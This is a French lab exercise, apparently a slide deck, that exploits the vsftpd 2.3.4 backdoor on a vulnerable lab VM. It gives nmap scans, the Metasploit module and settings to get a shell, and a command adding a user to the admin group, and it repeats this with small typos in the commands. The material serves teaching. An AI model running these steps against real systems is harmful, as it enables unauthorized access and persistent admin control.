TP1 : exploitation des failles du service FTP :
I.Objectifs :
I. Exploiter les failles de vsftpd 2.3.4 pour faire du reverse shell
II. Les prérequis :
 Machine virtuelle vulnérable (vsftpd 2.3.4)
 Métasploit
III. Mise en œuvre :
1. Scan les failles de FTP
Nous allons commencer à analyser le port ftp de la machine Ubuntu vulnérable qui
a comme adresse 192.168.200.104/24
#nmap –p 21 192.168.200.104
La capture ci-dessus montre que le port 21 est ouvert
Nous pouvons voir le port ouvert pour ftp, pour voir les informations détaillées sur
le port FTP,
utilisez la commande ci-dessous.
#nmap -sCV -A -T4 - p 21 192.168.200.104
La capture ci-dessus montre que la version de ftp (vsftpd 2.3.4) qui est vulnerable
2. Configuration de reverse shell :
Une fois que nous avons vu les informations détaillées sur le service FTP, accédez à metasploit et
recherchez l'exploit vsftpd
#msfconsole
#search vstfpd
Maintenant, on peut utiliser le module exploit/unix/ftp/vsftpd/_234_backdoor pour prendre le
contrôle de la machine
#use exploit/unix/ftp/vsftpd/_234_backdoor
# set rhosts 192.168.200.104
# set rport 21
# show options
# run
# shell
Résumé: ajout d’un user au groupe admin
#gpasswd -a user admin

meta_ftp.TP1 : exploitation des failles du service FTP :

  • 1.
    TP1 : exploitationdes failles du service FTP : I.Objectifs : I. Exploiter les failles de vsftpd 2.3.4 pour faire du reverse shell II. Les prérequis :  Machine virtuelle vulnérable (vsftpd 2.3.4)  Métasploit III. Mise en œuvre : 1. Scan les failles de FTP Nous allons commencer à analyser le port ftp de la machine Ubuntu vulnérable qui a comme adresse 192.168.200.104/24 #nmap –p 21 192.168.200.104 La capture ci-dessus montre que le port 21 est ouvert Nous pouvons voir le port ouvert pour ftp, pour voir les informations détaillées sur le port FTP, utilisez la commande ci-dessous. #nmap -sCV -A -T4 - p 21 192.168.200.104
  • 2.
    La capture ci-dessusmontre que la version de ftp (vsftpd 2.3.4) qui est vulnerable 2. Configuration de reverse shell : Une fois que nous avons vu les informations détaillées sur le service FTP, accédez à metasploit et recherchez l'exploit vsftpd #msfconsole #search vstfpd
  • 3.
    Maintenant, on peututiliser le module exploit/unix/ftp/vsftpd/_234_backdoor pour prendre le contrôle de la machine #use exploit/unix/ftp/vsftpd/_234_backdoor # set rhosts 192.168.200.104 # set rport 21
  • 4.
    # show options #run # shell Résumé: ajout d’un user au groupe admin #gpasswd -a user admin